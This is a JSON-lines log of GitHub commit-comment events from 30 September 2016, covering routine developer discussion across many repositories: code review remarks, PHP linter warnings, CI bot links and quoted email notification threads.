{"id":"4645915241","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248418,"position":23,"line":23,"path":"dbTest/forms/rep_DogSit.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T21:19:57Z","updated_at":"2016-09-30T21:19:57Z","body":"If you mean the parentheses inside of INSERT INTO -- that's the syntax that I was seeing when I looked up how to do it (Probably w3). I can't remember if I tried leaving it out and didn't work or not..."}},"created_at":"2016-09-30T21:19:57Z"}
{"id":"4645915437","type":"CommitCommentEvent","actor":{"login":"bluegr"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19248419,"position":null,"line":null,"path":null,"commit_id":"d0517f515eb7f36ec7222f3d50f4917fbd7df5e7","created_at":"2016-09-30T21:20:00Z","updated_at":"2016-09-30T21:20:00Z","body":"This commit breaks RTL (return to launcher) functionality. There is a check in EventManager::updateScreen() for g_engine->shouldQuit(), which is no longer checked, so the user can't exit ScummVM or return to launcher."}},"created_at":"2016-09-30T21:20:00Z"}
{"id":"4645919248","type":"CommitCommentEvent","actor":{"login":"rictic"},"repo":{"name":"Polymer/polymer-build"},"payload":{"comment":{"id":19248426,"position":34,"line":155,"path":"src/analyzer.ts","commit_id":"55e6ffc1ca39729c4929386060003783990bf7e1","created_at":"2016-09-30T21:20:50Z","updated_at":"2016-09-30T21:20:50Z","body":"(I was going to grumble about the name of this method, but then I double checked and realized that it's part of the Transform interface. Maybe add a comment though?)"}},"created_at":"2016-09-30T21:20:50Z"}
{"id":"4645920056","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248427,"position":28,"line":28,"path":"dbTest/forms/rep_DogSit.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T21:21:01Z","updated_at":"2016-09-30T21:21:01Z","body":"I'm pretty sure these echo statements were simply there so I could see if it was working or not. What would we be doing with AJAX there?\r\n"}},"created_at":"2016-09-30T21:21:01Z"}
{"id":"4645920381","type":"CommitCommentEvent","actor":{"login":"agreif"},"repo":{"name":"zaquest/yesod-recaptcha"},"payload":{"comment":{"id":19248428,"position":null,"line":null,"path":null,"commit_id":"0123ead8209187cefc801dcef86c00b20031c001","created_at":"2016-09-30T21:21:05Z","updated_at":"2016-09-30T21:21:05Z","body":"thanks, works like a charm!"}},"created_at":"2016-09-30T21:21:05Z"}
{"id":"4645922488","type":"CommitCommentEvent","actor":{"login":"wohhie"},"repo":{"name":"wohhie/ANDROID"},"payload":{"comment":{"id":19248432,"position":null,"line":null,"path":null,"commit_id":"db312e2971f9bea1f398f0bfd92bd7d2abfd5954","created_at":"2016-09-30T21:21:31Z","updated_at":"2016-09-30T21:21:31Z","body":"Singleton added."}},"created_at":"2016-09-30T21:21:31Z"}
{"id":"4645929087","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19248447,"position":null,"line":null,"path":null,"commit_id":"fcab227ad7b55869e76d72cc8bdc3fc07da436c4","created_at":"2016-09-30T21:23:05Z","updated_at":"2016-09-30T21:23:05Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Umi7jxqaSqK8YRfB2-t4Sg"}},"created_at":"2016-09-30T21:23:05Z"}
{"id":"4645929718","type":"CommitCommentEvent","actor":{"login":"kaeldi93"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19248448,"position":1,"line":1,"path":"dbTest/forms/tablemaker.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T21:23:14Z","updated_at":"2016-09-30T21:23:14Z","body":"This is a purely mechanical php document that I coded and was using simply because I'm lazy and didn't want to actually create each table outright. After making a form I simply submit to this instead of the actual processor and it creates the matching table for me (I can just alter the types)."}},"created_at":"2016-09-30T21:23:14Z"}
{"id":"4645933096","type":"CommitCommentEvent","actor":{"login":"JeffBusterCase"},"repo":{"name":"busting-cases/Eco-C"},"payload":{"comment":{"id":19248462,"position":null,"line":null,"path":null,"commit_id":"5ca86a496226683d99d78673674cb217446677bf","created_at":"2016-09-30T21:24:04Z","updated_at":"2016-09-30T21:24:04Z","body":"eu sei, era só um commit. mas bugou aqui dnovo pq o atom n suportava merge. até eu instala-lo agora."}},"created_at":"2016-09-30T21:24:04Z"}
{"id":"4645937087","type":"CommitCommentEvent","actor":{"login":"JPrevost"},"repo":{"name":"MITLibraries/tryiiif"},"payload":{"comment":{"id":19248470,"position":null,"line":null,"path":null,"commit_id":"efc58fda7c32c4d4da6434088f0af5e0e34d8a5d","created_at":"2016-09-30T21:25:01Z","updated_at":"2016-09-30T21:25:01Z","body":"It does to staging first. I can click it to prod when I'm back at a computer."}},"created_at":"2016-09-30T21:25:01Z"}
{"id":"4645946496","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19248491,"position":5,"line":2570,"path":"src/pocketmine/Server.php","commit_id":"3cd745f18d5eb41c1e637d925e16f090d97c913f","created_at":"2016-09-30T21:27:10Z","updated_at":"2016-09-30T21:27:10Z","body":"I still read through all stuff to fix freezes also on commit history.\r\nThats why there won't be any 0.16.\r\nI also plan on removing raklib, PyCraft/By/BiteCraftPE does not use such mesd"}},"created_at":"2016-09-30T21:27:10Z"}
{"id":"4645949626","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19248496,"position":null,"line":null,"path":null,"commit_id":"f44640541d262f0fb75d9c47eb2212e53437092b","created_at":"2016-09-30T21:27:54Z","updated_at":"2016-09-30T21:27:54Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KW8Mf-mkQK2Dj94z2uF_lw"}},"created_at":"2016-09-30T21:27:54Z"}
{"id":"4645949782","type":"CommitCommentEvent","actor":{"login":"tarartem"},"repo":{"name":"tarartem/forgotenList"},"payload":{"comment":{"id":19248497,"position":null,"line":null,"path":null,"commit_id":"8d03d61100708498b151d706d453fd82830f45f9","created_at":"2016-09-30T21:27:57Z","updated_at":"2016-09-30T21:27:57Z","body":"core source code"}},"created_at":"2016-09-30T21:27:57Z"}
{"id":"4645951949","type":"CommitCommentEvent","actor":{"login":"tarartem"},"repo":{"name":"tarartem/forgotenList"},"payload":{"comment":{"id":19248501,"position":null,"line":null,"path":null,"commit_id":"f42d210e9724c858d517e66e0a423bb041fedb35","created_at":"2016-09-30T21:28:30Z","updated_at":"2016-09-30T21:28:30Z","body":"test"}},"created_at":"2016-09-30T21:28:30Z"}
{"id":"4645952492","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"TaskClusterRobot/hooks-testing"},"payload":{"comment":{"id":19248503,"position":null,"line":null,"path":null,"commit_id":"baf9d39a71472ec4cb63b9a4935c4bde434aa11b","created_at":"2016-09-30T21:28:38Z","updated_at":"2016-09-30T21:28:38Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#EPHNiS34T6qhK4B-tEssCQ"}},"created_at":"2016-09-30T21:28:38Z"}
{"id":"4645952931","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/positron"},"payload":{"comment":{"id":19248504,"position":null,"line":null,"path":null,"commit_id":"a921e1b6ea3ad6edfe3ff2193b9fe4fd13add3e1","created_at":"2016-09-30T21:28:44Z","updated_at":"2016-09-30T21:28:44Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#HwBxZMs0SpWp6NnLbFsDWQ"}},"created_at":"2016-09-30T21:28:44Z"}
{"id":"4645953862","type":"CommitCommentEvent","actor":{"login":"apa-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19248506,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T21:28:58Z","updated_at":"2016-09-30T21:28:58Z","body":"![giphy](https://cloud.githubusercontent.com/assets/7643769/19007486/e2c4a4da-8782-11e6-8bb9-691a93168481.gif)\r\n"}},"created_at":"2016-09-30T21:28:58Z"}
{"id":"4645955479","type":"CommitCommentEvent","actor":{"login":"Gerst20051"},"repo":{"name":"lmirosevic/GBDeviceInfo"},"payload":{"comment":{"id":19248512,"position":214,"line":264,"path":"GBDeviceInfo/GBDeviceInfo_iOS.m","commit_id":"628810f4a6551df62881b1464a50e32335366857","created_at":"2016-09-30T21:29:23Z","updated_at":"2016-09-30T21:29:23Z","body":"do you know why they skipped to a major version of 7 instead of 6 for the 6th generation ipod?"}},"created_at":"2016-09-30T21:29:23Z"}
{"id":"4645958350","type":"CommitCommentEvent","actor":{"login":"imaibou"},"repo":{"name":"the-useless-one/pywerview"},"payload":{"comment":{"id":19248520,"position":null,"line":null,"path":null,"commit_id":"6eace237766efe59424207cdf3ca3b054a1dd94b","created_at":"2016-09-30T21:30:04Z","updated_at":"2016-09-30T21:30:04Z","body":"Thanks mate"}},"created_at":"2016-09-30T21:30:04Z"}
{"id":"4645958695","type":"CommitCommentEvent","actor":{"login":"JPrevost"},"repo":{"name":"MITLibraries/tryiiif"},"payload":{"comment":{"id":19248521,"position":null,"line":null,"path":null,"commit_id":"efc58fda7c32c4d4da6434088f0af5e0e34d8a5d","created_at":"2016-09-30T21:30:10Z","updated_at":"2016-09-30T21:30:10Z","body":"Should be live now"}},"created_at":"2016-09-30T21:30:10Z"}
{"id":"4645962137","type":"CommitCommentEvent","actor":{"login":"rachmadaniHaryono"},"repo":{"name":"pushrbx/python3-mal"},"payload":{"comment":{"id":19248529,"position":null,"line":null,"path":null,"commit_id":"a50b3b23ec7ea91e1c0e8f66e76a6a68b782f262","created_at":"2016-09-30T21:30:50Z","updated_at":"2016-09-30T21:30:50Z","body":"It will be hard to merge out code, because we use different structure (bs4 and lxml). And I may don't have enough time to maintain this project. \r\n\r\nI will try to adopt the change you made,  so it is possible with bs4 on my repo(just like this case) . If you can separate edit which need lxml and which not, I can cherry pick your commit, so your name can be seen as contributor. \r\n\r\nIf you want to upload to pypi, go ahead. You may need to file claim issue here sourceforge.net/p/pypi/support-requests/"}},"created_at":"2016-09-30T21:30:50Z"}
{"id":"4645970442","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"unified-db/Database"},"payload":{"comment":{"id":19248544,"position":4,"line":4,"path":"Updates/479_gameobject.sql","commit_id":"450394d650bdbe11a3dfcadc48430942825a94a2","created_at":"2016-09-30T21:32:49Z","updated_at":"2016-09-30T21:32:49Z","body":"Twice the same just to be sure eh? :D"}},"created_at":"2016-09-30T21:32:49Z"}
{"id":"4645972144","type":"CommitCommentEvent","actor":{"login":"pedrosnk"},"repo":{"name":"backstage/functions"},"payload":{"comment":{"id":19248548,"position":11,"line":11,"path":"lib/http/routers/HealthcheckRouter.js","commit_id":"5c8380ad051fea12ee74f7735019be19f4b90a7d","created_at":"2016-09-30T21:33:13Z","updated_at":"2016-09-30T21:33:13Z","body":"using `app`.set should fix that issue right?"}},"created_at":"2016-09-30T21:33:13Z"}
{"id":"4645973687","type":"CommitCommentEvent","actor":{"login":"phawind"},"repo":{"name":"geekrypter/adobe.github.com"},"payload":{"comment":{"id":19248549,"position":null,"line":null,"path":null,"commit_id":"6fdf221e987a9dc78304ec9d8cbbb07d2bcd0c40","created_at":"2016-09-30T21:33:35Z","updated_at":"2016-09-30T21:33:35Z","body":"README.md"}},"created_at":"2016-09-30T21:33:35Z"}
{"id":"4645978302","type":"CommitCommentEvent","actor":{"login":"phawind"},"repo":{"name":"geekrypter/adobe.github.com"},"payload":{"comment":{"id":19248560,"position":null,"line":null,"path":null,"commit_id":"6fdf221e987a9dc78304ec9d8cbbb07d2bcd0c40","created_at":"2016-09-30T21:34:42Z","updated_at":"2016-09-30T21:34:42Z","body":"+- Are you a *web developer*? Search the repositories only containing *Javascript* code, because it rocks!\r\n+- Love doing *technology watching*? Order by *Popularity*, by *Last Push* or select only the *5 stars (>1k followers)* projects to get the hottest repos!\r\n+- Are you a *web designer* and want the perfect code editor? Search *brackets* and get all the repositories related to this awesome project!\r\n+- Are you a *researcher*? Check out the project pushed in Open Source by the *Adobe Research* organization!"}},"created_at":"2016-09-30T21:34:42Z"}
{"id":"4645979538","type":"CommitCommentEvent","actor":{"login":"DanTsk"},"repo":{"name":"DanTsk/JSBList"},"payload":{"comment":{"id":19248564,"position":9,"line":239,"path":"main.css","commit_id":"b11350f29e7edde9b1a7914e2027c207a510afb2","created_at":"2016-09-30T21:35:00Z","updated_at":"2016-09-30T21:35:00Z","body":"Ooooopssss"}},"created_at":"2016-09-30T21:35:00Z"}
{"id":"4645984446","type":"CommitCommentEvent","actor":{"login":"kurenn"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19248575,"position":3,"line":3,"path":"happiness/README.md","commit_id":"55f4e052e9efa3ede859d5bf151d48dbe55f6785","created_at":"2016-09-30T21:36:08Z","updated_at":"2016-09-30T21:36:08Z","body":"You are right!"}},"created_at":"2016-09-30T21:36:08Z"}
{"id":"4645985442","type":"CommitCommentEvent","actor":{"login":"wpjunior"},"repo":{"name":"backstage/functions"},"payload":{"comment":{"id":19248578,"position":11,"line":11,"path":"lib/http/routers/HealthcheckRouter.js","commit_id":"5c8380ad051fea12ee74f7735019be19f4b90a7d","created_at":"2016-09-30T21:36:21Z","updated_at":"2016-09-30T21:36:21Z","body":"I think that expression fix the problem `req.app.get('storage')`"}},"created_at":"2016-09-30T21:36:21Z"}
{"id":"4645991764","type":"CommitCommentEvent","actor":{"login":"vkrem"},"repo":{"name":"vkrem/myscheduler"},"payload":{"comment":{"id":19248599,"position":2,"line":2,"path":"README.md","commit_id":"cf0cc577e153b9a1cfe53849e88d998f98cff5ed","created_at":"2016-09-30T21:37:52Z","updated_at":"2016-09-30T21:37:52Z","body":"Initial comments"}},"created_at":"2016-09-30T21:37:52Z"}
{"id":"4645993053","type":"CommitCommentEvent","actor":{"login":"jflayhart"},"repo":{"name":"AllenFang/react-bootstrap-table"},"payload":{"comment":{"id":19248602,"position":null,"line":null,"path":null,"commit_id":"ba524f964a06f182bf60cb105a53a18861fea747","created_at":"2016-09-30T21:38:10Z","updated_at":"2016-09-30T21:38:10Z","body":"you da man, @AllenFang "}},"created_at":"2016-09-30T21:38:10Z"}
{"id":"4645994137","type":"CommitCommentEvent","actor":{"login":"kurenn"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19248606,"position":35,"line":35,"path":"happiness/README.md","commit_id":"55f4e052e9efa3ede859d5bf151d48dbe55f6785","created_at":"2016-09-30T21:38:26Z","updated_at":"2016-09-30T21:38:26Z","body":"It is more related to take more advantage of the text editor, but I'll update it!"}},"created_at":"2016-09-30T21:38:26Z"}
{"id":"4645997178","type":"CommitCommentEvent","actor":{"login":"10110111"},"repo":{"name":"eteran/edb-debugger"},"payload":{"comment":{"id":19248614,"position":null,"line":null,"path":null,"commit_id":"8bb5e1369d148ed4b565e7d2cc7ca73cd8d3dba7","created_at":"2016-09-30T21:39:12Z","updated_at":"2016-09-30T21:39:12Z","body":"I get a compilation error with this commit:\r\n\r\n    /home/ruslan/src/edb-debugger/plugins/DebuggerCore/unix/linux/DialogMemoryAccess.cpp:20:35: fatal error: ui_DialogMemoryAccess.h: No such file or directory"}},"created_at":"2016-09-30T21:39:12Z"}
{"id":"4645998801","type":"CommitCommentEvent","actor":{"login":"MPolymath"},"repo":{"name":"soixantecircuits/spacebro-client"},"payload":{"comment":{"id":19248620,"position":3,"line":3,"path":"dist/mdns.js","commit_id":"a568714f4d0582d1857a7d650d736a91d942bd8c","created_at":"2016-09-30T21:39:36Z","updated_at":"2016-09-30T21:39:36Z","body":"Using the lucca software we (me and emmanuel) kept getting mdns module\nerrors even though mdns was only required when window === undefined. And we\ncouldn't understand why , this was one of the places we traced it back to\n:).\n\nOn Sep 30, 2016 20:46, \"Gabriel\" <notifications@github.com> wrote:\n\n> Not sure what you talk about :)\n> Le ven. 30 sept. 2016 à 20:23, Massamba Diouf <notifications@github.com> a\n> écrit :\n>\n> > This should be around a if (typeof window === undefined) isnt it? cc\n> > @gabrielstuff <https://github.com/gabrielstuff>\n> >\n> > —\n> > You are receiving this because you were mentioned.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/soixantecircuits/spacebro-client/commit/\n> a568714f4d0582d1857a7d650d736a91d942bd8c#commitcomment-19245792>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/\n> AARZaTcONOuuNJq2jcm94y9PgwqMYV-fks5qvVOsgaJpZM4KLX1y>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/soixantecircuits/spacebro-client/commit/a568714f4d0582d1857a7d650d736a91d942bd8c#commitcomment-19246127>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGGSS5SYsm47qI9bZG7wbDf0R_NbnUNrks5qvVhwgaJpZM4KLX1y>\n> .\n>\n"}},"created_at":"2016-09-30T21:39:36Z"}
{"id":"4646000019","type":"CommitCommentEvent","actor":{"login":"kurenn"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19248622,"position":51,"line":51,"path":"happiness/README.md","commit_id":"55f4e052e9efa3ede859d5bf151d48dbe55f6785","created_at":"2016-09-30T21:39:55Z","updated_at":"2016-09-30T21:39:55Z","body":"Thanks!"}},"created_at":"2016-09-30T21:39:55Z"}
{"id":"4646001948","type":"CommitCommentEvent","actor":{"login":"eteran"},"repo":{"name":"eteran/edb-debugger"},"payload":{"comment":{"id":19248626,"position":null,"line":null,"path":null,"commit_id":"8bb5e1369d148ed4b565e7d2cc7ca73cd8d3dba7","created_at":"2016-09-30T21:40:22Z","updated_at":"2016-09-30T21:40:22Z","body":"OK, I'll look into it"}},"created_at":"2016-09-30T21:40:22Z"}
{"id":"4646002013","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248627,"position":20,"line":null,"path":"src/Orm.php","commit_id":"ecb78182780f4c0298e5e4b205266fbf7bdea502","created_at":"2016-09-30T21:40:23Z","updated_at":"2016-09-30T21:40:23Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-30T21:40:23Z"}
{"id":"4646002072","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248629,"position":19,"line":null,"path":"src/Orm.php","commit_id":"ecb78182780f4c0298e5e4b205266fbf7bdea502","created_at":"2016-09-30T21:40:24Z","updated_at":"2016-09-30T21:40:24Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-30T21:40:24Z"}
{"id":"4646002155","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248630,"position":5,"line":null,"path":"src/Orm.php","commit_id":"ecb78182780f4c0298e5e4b205266fbf7bdea502","created_at":"2016-09-30T21:40:25Z","updated_at":"2016-09-30T21:40:25Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-30T21:40:25Z"}
{"id":"4646002187","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248631,"position":11,"line":null,"path":"src/Orm.php","commit_id":"ecb78182780f4c0298e5e4b205266fbf7bdea502","created_at":"2016-09-30T21:40:26Z","updated_at":"2016-09-30T21:40:26Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-30T21:40:26Z"}
{"id":"4646002211","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248632,"position":17,"line":null,"path":"src/Orm.php","commit_id":"ecb78182780f4c0298e5e4b205266fbf7bdea502","created_at":"2016-09-30T21:40:26Z","updated_at":"2016-09-30T21:40:26Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-30T21:40:26Z"}
{"id":"4646002391","type":"CommitCommentEvent","actor":{"login":"kurenn"},"repo":{"name":"IcaliaLabs/guides"},"payload":{"comment":{"id":19248633,"position":15,"line":15,"path":"stack/ruby/BEST_PRACTICES.md","commit_id":"4ec4a1cd50dee83f6fddb2635e5aa67484c76ecd","created_at":"2016-09-30T21:40:29Z","updated_at":"2016-09-30T21:40:29Z","body":"Yeah, gives more power to the word!"}},"created_at":"2016-09-30T21:40:29Z"}
{"id":"4646003712","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248638,"position":20,"line":null,"path":"src/Orm.php","commit_id":"414bd85ac9274bf07ee17a24904f550a97772db3","created_at":"2016-09-30T21:40:48Z","updated_at":"2016-09-30T21:40:48Z","body":"\n      Avoid unused local variables such as '$ind'.\n    "}},"created_at":"2016-09-30T21:40:48Z"}
{"id":"4646003778","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248639,"position":19,"line":null,"path":"src/Orm.php","commit_id":"414bd85ac9274bf07ee17a24904f550a97772db3","created_at":"2016-09-30T21:40:49Z","updated_at":"2016-09-30T21:40:49Z","body":"PHPCS: Opening parenthesis of a multi-line function call must be the last content on the line"}},"created_at":"2016-09-30T21:40:49Z"}
{"id":"4646003842","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248640,"position":5,"line":null,"path":"src/Orm.php","commit_id":"414bd85ac9274bf07ee17a24904f550a97772db3","created_at":"2016-09-30T21:40:50Z","updated_at":"2016-09-30T21:40:50Z","body":"Class Orm is missing a docblock."}},"created_at":"2016-09-30T21:40:50Z"}
{"id":"4646003869","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248641,"position":11,"line":null,"path":"src/Orm.php","commit_id":"414bd85ac9274bf07ee17a24904f550a97772db3","created_at":"2016-09-30T21:40:50Z","updated_at":"2016-09-30T21:40:50Z","body":"Orm::__construct is missing a docblock."}},"created_at":"2016-09-30T21:40:50Z"}
{"id":"4646003889","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248643,"position":17,"line":null,"path":"src/Orm.php","commit_id":"414bd85ac9274bf07ee17a24904f550a97772db3","created_at":"2016-09-30T21:40:51Z","updated_at":"2016-09-30T21:40:51Z","body":"Orm::find is missing a docblock."}},"created_at":"2016-09-30T21:40:51Z"}
{"id":"4646004368","type":"CommitCommentEvent","actor":{"login":"ColinAvrech"},"repo":{"name":"robbyrussell/oh-my-zsh"},"payload":{"comment":{"id":19248645,"position":null,"line":null,"path":null,"commit_id":"2c9a889c4c323a618e01bb47d3a0ec0613333d89","created_at":"2016-09-30T21:40:57Z","updated_at":"2016-09-30T21:40:57Z","body":"Added windows since the Win 10 Anniversary Update added the beta Windows Subsystem for Linux. Through this you can install all the pre-requisites needed to install oh-my-zsh."}},"created_at":"2016-09-30T21:40:57Z"}
{"id":"4646004936","type":"CommitCommentEvent","actor":{"login":"gabrielstuff"},"repo":{"name":"soixantecircuits/spacebro-client"},"payload":{"comment":{"id":19248649,"position":3,"line":3,"path":"dist/mdns.js","commit_id":"a568714f4d0582d1857a7d650d736a91d942bd8c","created_at":"2016-09-30T21:41:06Z","updated_at":"2016-09-30T21:41:06Z","body":"Well now you can use it in peace\nLe ven. 30 sept. 2016 à 23:39, Massamba Diouf <notifications@github.com> a\nécrit :\n\n> Using the lucca software we (me and emmanuel) kept getting mdns module\n> errors even though mdns was only required when window === undefined. And we\n> couldn't understand why , this was one of the places we traced it back to\n> :).\n>\n> On Sep 30, 2016 20:46, \"Gabriel\" <notifications@github.com> wrote:\n>\n> > Not sure what you talk about :)\n> > Le ven. 30 sept. 2016 à 20:23, Massamba Diouf <notifications@github.com>\n> a\n> > écrit :\n> >\n> > > This should be around a if (typeof window === undefined) isnt it? cc\n> > > @gabrielstuff <https://github.com/gabrielstuff>\n> > >\n> > > —\n> > > You are receiving this because you were mentioned.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/soixantecircuits/spacebro-client/commit/\n> > a568714f4d0582d1857a7d650d736a91d942bd8c#commitcomment-19245792>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-auth/\n> > AARZaTcONOuuNJq2jcm94y9PgwqMYV-fks5qvVOsgaJpZM4KLX1y>\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/soixantecircuits/spacebro-client/commit/a568714f4d0582d1857a7d650d736a91d942bd8c#commitcomment-19246127\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AGGSS5SYsm47qI9bZG7wbDf0R_NbnUNrks5qvVhwgaJpZM4KLX1y\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/soixantecircuits/spacebro-client/commit/a568714f4d0582d1857a7d650d736a91d942bd8c#commitcomment-19248620>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AARZaTRZGcRtwaC7iDABI5TjBQLkvCuaks5qvYGZgaJpZM4KLX1y>\n> .\n>\n"}},"created_at":"2016-09-30T21:41:06Z"}
{"id":"4646005642","type":"CommitCommentEvent","actor":{"login":"syl20bnr"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":19248653,"position":null,"line":null,"path":null,"commit_id":"604c8f2621645c60cc642413302131628ce0df67","created_at":"2016-09-30T21:41:17Z","updated_at":"2016-09-30T21:41:17Z","body":"This looks good to me 👍 "}},"created_at":"2016-09-30T21:41:17Z"}
{"id":"4646006941","type":"CommitCommentEvent","actor":{"login":"straversi"},"repo":{"name":"Nsrose/giver-game"},"payload":{"comment":{"id":19248659,"position":null,"line":null,"path":null,"commit_id":"c9112178d15bc8ef1bc3871d65d760eeb8328823","created_at":"2016-09-30T21:41:37Z","updated_at":"2016-09-30T21:41:37Z","body":"👍\r\n"}},"created_at":"2016-09-30T21:41:37Z"}
{"id":"4646014459","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248672,"position":20,"line":null,"path":"src/Parsers/Csv.php","commit_id":"4a8d8d7e8950560f5e0f3e6559edb7a13c81892b","created_at":"2016-09-30T21:43:27Z","updated_at":"2016-09-30T21:43:27Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:43:27Z"}
{"id":"4646014492","type":"CommitCommentEvent","actor":{"login":"Spell-Master"},"repo":{"name":"Cronus-Emulator/Cronus"},"payload":{"comment":{"id":19248673,"position":null,"line":null,"path":null,"commit_id":"330e1d81d58b1a1904437237aca57f4693dab4aa","created_at":"2016-09-30T21:43:28Z","updated_at":"2016-09-30T21:43:28Z","body":"Agradecimento a \"Cainho\" membro do forum cronus por reportar os erros"}},"created_at":"2016-09-30T21:43:28Z"}
{"id":"4646014529","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248674,"position":21,"line":null,"path":"src/Parsers/Csv.php","commit_id":"4a8d8d7e8950560f5e0f3e6559edb7a13c81892b","created_at":"2016-09-30T21:43:28Z","updated_at":"2016-09-30T21:43:28Z","body":"PHPCS: Expected 1 space after IF keyword; 0 found"}},"created_at":"2016-09-30T21:43:28Z"}
{"id":"4646015445","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248676,"position":20,"line":null,"path":"src/Parsers/Csv.php","commit_id":"2651981cc2d21b3fac1df80f6ec5d502218480af","created_at":"2016-09-30T21:43:40Z","updated_at":"2016-09-30T21:43:40Z","body":"\n      Avoid variables with short names like $v. Configured minimum length is 3.\n    "}},"created_at":"2016-09-30T21:43:40Z"}
{"id":"4646015518","type":"CommitCommentEvent","actor":{"login":"edbizarro"},"repo":{"name":"convenia/dominio-payslip-import"},"payload":{"comment":{"id":19248677,"position":21,"line":null,"path":"src/Parsers/Csv.php","commit_id":"2651981cc2d21b3fac1df80f6ec5d502218480af","created_at":"2016-09-30T21:43:41Z","updated_at":"2016-09-30T21:43:41Z","body":"PHPCS: Expected 1 space after IF keyword; 0 found"}},"created_at":"2016-09-30T21:43:41Z"}
{"id":"4646016177","type":"CommitCommentEvent","actor":{"login":"ddurieux"},"repo":{"name":"glpi-project/docdev"},"payload":{"comment":{"id":19248679,"position":32,"line":29,"path":"source/specifications/lessql.rst","commit_id":"e1c322e5a00c86cf71e568ca5a383409904c3c51","created_at":"2016-09-30T21:43:51Z","updated_at":"2016-09-30T21:43:51Z","body":"lessql use it and foreignkey is often used like this"}},"created_at":"2016-09-30T21:43:51Z"}
